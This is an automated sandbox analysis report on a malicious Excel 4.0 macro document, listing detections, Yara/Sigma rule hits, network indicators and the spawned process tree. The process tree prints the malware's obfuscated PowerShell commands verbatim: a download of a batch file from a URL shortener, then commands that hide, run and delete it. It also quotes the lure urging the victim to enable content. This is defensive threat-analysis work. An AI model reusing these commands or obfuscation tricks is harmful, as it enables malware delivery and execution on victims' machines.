
Analysis Report SIN029088.xls

Overview

General Information

Sample Name: SIN029088.xls
Analysis ID: 319129
MD5: 483a0f4cb6a70556b34aed04f24f7962
SHA1: cbd6b0004aca06a46b4863bfbc13f444b3404483
SHA256: ccab18c2ba789320bdb50d364ce3f70a625c60c68a93ad05bbca056f9f6f821a

Detection

Hidden Macro 4.0
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Connects to a URL shortener service
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5652 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • cmd.exe (PID: 5804 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 800 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 5764 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 1720 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 5860 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 912 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • attrib.exe (PID: 5400 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: A5540E9F87D4CB083BDF8269DEC1CFF9)
    • cmd.exe (PID: 2992 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 4824 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 4972 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat') MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5344 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat') MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: SIN029088.xls
Rule: SUSP_Excel4Macro_AutoOpen
Description: Detects Excel4 macro use with auto open / close
Author: John Lambert @JohnLaTwC
Strings:
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x10dc2:$s1: Excel
  • 0x3408:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Data: Command: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5652, ProcessCommandLine: cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 5804
Sigma detected: Hiding Files with Attrib.exe
Source: Process started, Author: Sami Ruohonen, Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\attrib.exe, NewProcessName: C:\Windows\SysWOW64\attrib.exe, OriginalFileName: C:\Windows\SysWOW64\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 912, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 5400

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: SIN029088.xls, Virustotal: Detection: 7%
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C799DE FindFirstFileNameTransactedW
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C79C6E FindFirstFileNameTransactedW

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\cmd.exe
Source: global traffic, DNS query: name: tinyurl.com
Source: global traffic, TCP traffic: 192.168.2.3:49688 -> 104.20.139.65:443

Networking:

Connects to a URL shortener service
Source: unknown, DNS query: name: tinyurl.com
Source: Joe Sandbox View, IP Address: 104.20.139.65
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, String found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=196261077476671&ev=PageView&nos equals www.facebook.com (Facebook)
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.dr, String found in binary or memory: <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=196261077476671&ev=PageView&noscript=1"/></noscript> equals www.facebook.com (Facebook)
Source: unknown, DNS traffic detected: queries for: tinyurl.com
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, String found in binary or memory: http://35.180.137.10/bat/scriptxls_4ebe5706-12b0-4bb2-89a9-a17fc5300f70_snowj1917.bat
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: powershell.exe, 0000000C.00000002.453215743.0000000007970000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.478692982.0000000003216000.00000004.00000020.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.441613141.0000000005551000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.461718645.0000000005471000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.434434476.0000000004C31000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.480221111.00000000050F1000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.449944220.0000000005421000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, String found in binary or memory: http://tinyurl.com
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.dr, String found in binary or memory: https://api.pushnami.com/scripts/v1/pushnami-adv/5c018cb890535b0010a5ea87
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, pd.bat.15.dr, String found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.453245282.0000000005565000.00000004.00000001.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000003.402281824.0000000005F86000.00000004.00000001.sdmp, powershell.exe, 00000009.00000003.412229988.0000000005E9B000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.444126941.00000000054C6000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000003.415829479.0000000005B1B000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.454341121.000000000562A000.00000004.00000001.sdmp, String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.457598759.00000000065B2000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.468695260.00000000064D3000.00000004.00000001.sdmp, powershell.exe, 0000000C.00000002.445995476.0000000005C95000.00000004.00000001.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: pd.bat.15.dr, String found in binary or memory: https://tinyurl.com
Source: powershell.exe, 0000000F.00000002.458341120.0000000005968000.00000004.00000001.sdmp, pd.bat.15.dr, String found in binary or memory: https://tinyurl.com/
Source: powershell.exe, 0000000F.00000002.458513367.0000000005988000.00000004.00000001.sdmp, String found in binary or memory: https://tinyurl.com/app/nospam/tinyurl.com/y252oqq3/terminated
Source: powershell.exe, 0000000F.00000002.458557491.000000000599F000.00000004.00000001.sdmp, pd.bat.15.dr, String found in binary or memory: https://tinyurl.com/favicon.ico
Source: PowerShell_transcript.302494.O2kFUmpi.20201118025653.txt.15.dr, String found in binary or memory: https://tinyurl.com/y252oqq3
Source: powershell.exe, 0000000F.00000002.458239803.000000000595A000.00000004.00000001.sdmp, String found in binary or memory: https://tinyurl.com4#f
Source: powershell.exe, 0000000F.00000002.466631450.0000000009C30000.00000004.00000001.sdmp, String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown, Network traffic detected: HTTP traffic on port 49688 -> 443

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0, Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 0, Screenshot OCR: Enable Content"
Source: Document image extraction number: 1, Screenshot OCR: Enable Editing" from the yellow bar and then click "Enable Content"
Source: Document image extraction number: 1, Screenshot OCR: Enable Content"
Found Excel 4.0 Macro with suspicious formulas
Source: SIN029088.xls, Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: SIN029088.xls, Initial sample: High usage of CHAR() function: 60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_0307D0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_0307A6E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_0307BA50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_0307D0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_03077750
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_0307B6F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_03075CD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_03075CE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031DAFA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031DE620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031DA640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031D0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031D6580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031DB4E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 9_2_031D59B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C02608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C7B0B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C79608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C7C720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C799DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C770A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C751C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C751B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C7C720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C79C6E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C76C30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00C7AD58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00EF5B30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00EF1788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00EF49B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00EF5B20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 12_2_00EF5B30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 14_2_00F72CC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035F6337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035F7AD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035FC9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035F0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035F6337
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035F18A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035FC9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_035FC9D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0531CB10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_084170A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0841C76A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0841C778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0841BEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0841BED8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0841709C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_08467E00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_05318B68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_05318B58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0531EA50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_0531EA41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 15_2_05319299
Source: SIN029088.xls OLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: SIN029088.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: classification engine Classification label: mal80.expl.evad.winXLS@28/31@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5835A2D8.tmp
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{527F5A61-258D-4140-896F-A7EC049D3ED0} - OProcSessId.dat
Source: SIN029088.xls OLE indicator, Workbook stream: true
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: SIN029088.xls Virustotal: Detection: 7%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknown Process created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000003.472129670.0000000008C05000.00000004.00000001.sdmp

Data Obfuscation:

Obfuscated command line found
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://tinyurl.com/y252oqq3','pd.bat')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
